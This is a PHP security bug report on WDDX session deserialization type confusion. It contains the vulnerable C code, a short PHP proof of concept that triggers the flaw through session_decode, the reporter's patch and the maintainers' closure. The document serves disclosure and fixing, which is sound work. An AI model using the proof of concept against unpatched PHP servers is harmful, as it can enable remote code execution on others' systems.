Home Original page

Session WDDX Packet Deserialization Type Confusion Vulnerability

Sec Bug #70741 Session WDDX Packet Deserialization Type Confusion Vulnerability
Submitted: 2015-10-19 14:36 UTC Modified: 2016-01-06 03:19 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: WDDX related
PHP Version: Irrelevant OS: *
Private report: No CVE-ID: None

 [2015-10-19 14:36 UTC] taoguangchen at icloud dot com

Description:
------------
Session WDDX Packet Deserialization Type Confusion Vulnerability

```
PS_SERIALIZER_DECODE_FUNC(wddx)
{
	...
	
	MAKE_STD_ZVAL(retval);

	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {

		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
			 zend_hash_get_current_data(Z_ARRVAL_P(retval), (void **) &ent) == SUCCESS;
			 zend_hash_move_forward(Z_ARRVAL_P(retval))) {
			 hash_type = zend_hash_get_current_key_ex(Z_ARRVAL_P(retval), &key, &key_length, &idx, 0, NULL);
```

an attacker can deserialize a string-type ZVAL via php_wddx_deserialize_ex(). this means the attacker is able to create fake HashTable via the Z_ARRVAL_P macro with the string-type ZVAL. this should result in arbitrary remote code execution.

PoC:
```
<?php

ini_set('session.serialize_handler', 'wddx');
session_start();

$hashtable = str_repeat('A', 66);
$wddx = "<?xml version='1.0'?>
<wddxPacket version='1.0'>
<header/>
	<data>
		<string>$hashtable</string>
	</data>
</wddxPacket>";
session_decode($wddx);

?>
```

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

 [2015-10-19 14:48 UTC] taoguangchen at icloud dot com

fix:
```
	if ((ret = php_wddx_deserialize_ex((char *)val, vallen, retval)) == SUCCESS) {
		
+		if (Z_TYPE_P(retval) != IS_ARRAY) {
+			return FAILURE;
+		}
		for (zend_hash_internal_pointer_reset(Z_ARRVAL_P(retval));
```

 [2015-12-28 20:45 UTC] stas@php.net

-Assigned To: +Assigned To: stas

 [2015-12-28 20:45 UTC] stas@php.net

In security repo as 1785d2b805f64eaaacf98c14c9e13107bf085ab1

 [2016-01-06 03:19 UTC] stas@php.net

-Status: Assigned +Status: Closed

 [2016-01-06 03:19 UTC] stas@php.net

The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

 [2016-02-02 10:53 UTC] korvin1986 at gmail dot com

Hello, 
is any CVE-ID exists for this vulnerability.
Or have I request it at http://www.cve.mitre.org ?